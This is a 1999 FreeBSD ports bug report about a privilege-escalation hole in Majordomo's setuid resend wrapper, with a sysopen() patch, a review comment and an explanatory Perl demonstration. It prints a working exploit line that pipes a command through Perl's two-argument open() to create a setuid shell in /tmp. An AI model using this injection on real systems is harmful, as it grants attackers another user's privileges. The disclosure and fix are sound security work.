From owner-freebsd-ports Wed Dec 29 11:40: 9 1999
Delivered-To: freebsd-ports@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 700F715861 for ; Wed, 29 Dec 1999 11:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org)
Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA75546; Wed, 29 Dec 1999 11:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org)
Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id 1DA1D15122 for ; Wed, 29 Dec 1999 11:38:58 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org)
Received: by anarcat.dyndns.org (Postfix, from userid 1000) id 78DC41BBD; Wed, 29 Dec 1999 11:43:19 -0500 (EST)
Message-Id: <19991229164319.78DC41BBD@anarcat.dyndns.org>
Date: Wed, 29 Dec 1999 11:43:19 -0500 (EST)
From: AnarCat@anarcat.dyndns.org
Reply-To: AnarCat
To: FreeBSD-gnats-submit@freebsd.org
X-Send-Pr-Version: 3.2
Subject: ports/15768: Majordomo resend prog allow exec of any prog as majordomo user
Sender: owner-freebsd-ports@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>Number:         15768
>Category:       ports
>Synopsis:       Majordomo resend prog allow exec of any prog as majordomo user
>Confidential:   no
>Severity:       serious
>Priority:       high
>Responsible:    freebsd-ports
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          change-request
>Submitter-Id:   current-users
>Arrival-Date:   Wed Dec 29 11:40:01 PST 1999
>Closed-Date:
>Last-Modified:
>Originator:     AnarCat
>Release:        FreeBSD 3.4-STABLE i386
>Organization:
>Environment:
Latest ports collection (dated 1999.12.28). Running 3.4-Stable. Should affect any system with the latest ports collection.
>Description:
[From BugTraq, Brock Tellier, btellier@USA.NET]

Majordomo features a wrapper that is suid root and then does setuid(majordomo). It is used to exec various programs in the $PREFIX/majordomo dir. One of them is the resend Perl script, which does an

    open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");

So this can be used to exec another program with the wrapper's privileges.
>How-To-Repeat:
Our exploit is simple:

bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh /tmp/xnec;chmod 6555 /tmp/xnec'
resend: must specify '-l list' at /usr/local/majordomo/resend line 77.
bash-2.02$ ls -la /tmp/xnec
-r-sr-sr-x  1 owner  daemon  361688 Dec 29 06:26 /tmp/xnec

In our case "owner" is majordomo.
>Fix:
From BugTraq again ("Todd C. Miller" ):

For those using perl 5.x, you can use sysopen() instead of the "magic" perl open() to fix this.

 - todd

--- resend	Thu Aug 19 10:12:03 1999
+++ resend+	Tue Dec 28 23:55:39 1999
@@ -58,7 +58,7 @@ if ($ARGV[0] =~ /^\@/) { $fn = shift(@ARGV); $fn =~ s/^@//; - open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped"); + sysopen(AV, $fn, O_RDONLY) || die("sysopen(AV, \"$fn\", O_RDONLY): $!\nStopped"); undef($/); # set input field separator $av = ; # read whole file into string close(AV);
>Release-Note:
>Audit-Trail:
>Unformatted:
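Review bot: the replacement line uses the O_RDONLY constant, but nothing in the hunk imports it; unless resend already has `use Fcntl;` above line 58, O_RDONLY is a bareword, which is a compile error under `use strict` and otherwise a non-numeric string that only evaluates to the right value by accident (0 is O_RDONLY on FreeBSD). Add `use Fcntl;` near the top of the script in the same patch so the fix does not depend on that coincidence. The substance of the change is right: sysopen() passes $fn to open(2) unchanged, so the leading `|` that two-argument open() reads as "pipe to a command" stops being special. $fn is still the caller-chosen `@file` argument, so resend will still read whatever file the majordomo user can open; that is pre-existing behaviour, not something this hunk introduces.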
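The mechanism behind the report, as an added example that is not part of the PR, of Majordomo, or of either BugTraq post: Perl's two-argument open() parses the mode out of the filename string, so a value beginning with `|` becomes a command to run, which is what the `'@|cp /bin/ksh ...'` argument above relies on once resend strips the leading `@`. The two functions below are this editor's reconstructions of the `open(AV, $fn)` pattern and of the sysopen() fix; the function names, the temporary files and the `|touch ...` payload are constructed for the demonstration.

```perl
#!/usr/bin/perl
# Added example (not Majordomo's code). read_av_vulnerable() mirrors the
# open(AV, $fn) line quoted in the PR; read_av_fixed() mirrors the sysopen()
# fix. Both receive a value that, like resend's '@file' argument, has already
# had its leading '@' removed.
use strict;
use warnings;
use Fcntl;                   # exports O_RDONLY; the fix needs this import
use File::Temp qw(tempdir);

# Vulnerable: two-argument open() decides the mode from the string itself.
# A leading '|' means "fork /bin/sh -c <rest>, attach AV to its stdin".
sub read_av_vulnerable {
    my ($fn) = @_;
    open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");
    local $/;                # slurp mode, like resend's undef($/)
    my $av = <AV>;           # on a write-only pipe this warns and yields undef
    close(AV);               # waits for the child if AV was a pipe
    return defined $av ? $av : '';
}

# Fixed: sysopen() hands the string to open(2) unchanged; '|' is just a byte.
# (On Perl 5.6 and later, open(my $fh, '<', $fn) is an equivalent fix.)
sub read_av_fixed {
    my ($fn) = @_;
    sysopen(AV, $fn, O_RDONLY)
        || die("sysopen(AV, \"$fn\", O_RDONLY): $!\nStopped");
    local $/;
    my $av = <AV>;
    close(AV);
    return defined $av ? $av : '';
}

my $dir    = tempdir(CLEANUP => 1);
my $legit  = "$dir/args.txt";      # constructed stand-in for a real '@file'
my $marker = "$dir/command-ran";   # created only if the payload executes

open(my $out, '>', $legit) or die "$legit: $!";
print $out "-l test-list\n";
close($out);

# 1. A genuine file name: both versions read it.
print "vulnerable, real file: ", read_av_vulnerable($legit);
print "fixed,      real file: ", read_av_fixed($legit);

# 2. Attacker-chosen name. Constructed payload; the report used
#    '@|cp /bin/ksh /tmp/xnec;chmod 6555 /tmp/xnec' (minus the '@' here).
my $payload = "|touch $marker";

# Two-argument open() runs 'touch' via the shell. Reading from AV returns
# nothing, but by the time close() returns the command has already run.
eval { read_av_vulnerable($payload) };
printf "vulnerable, payload: command executed = %s\n",
    (-e $marker ? 'yes' : 'no');
unlink $marker;

# sysopen() asks the kernel for a file literally named "|touch ...": ENOENT.
eval { read_av_fixed($payload) };
printf "fixed,      payload: died with: %s", $@ || "(no error)\n";
printf "fixed,      payload: command executed = %s\n",
    (-e $marker ? 'yes' : 'no');
```

Run it as an unprivileged user; it touches only files under its own temporary directory. The vulnerable call reports "command executed = yes" (Perl also warns that AV was opened only for output, which is the pipe-to-command handle), while the fixed call dies with "No such file or directory" and never creates the marker. In resend the same open() runs under the wrapper's setuid(majordomo), so the shell command runs as that user.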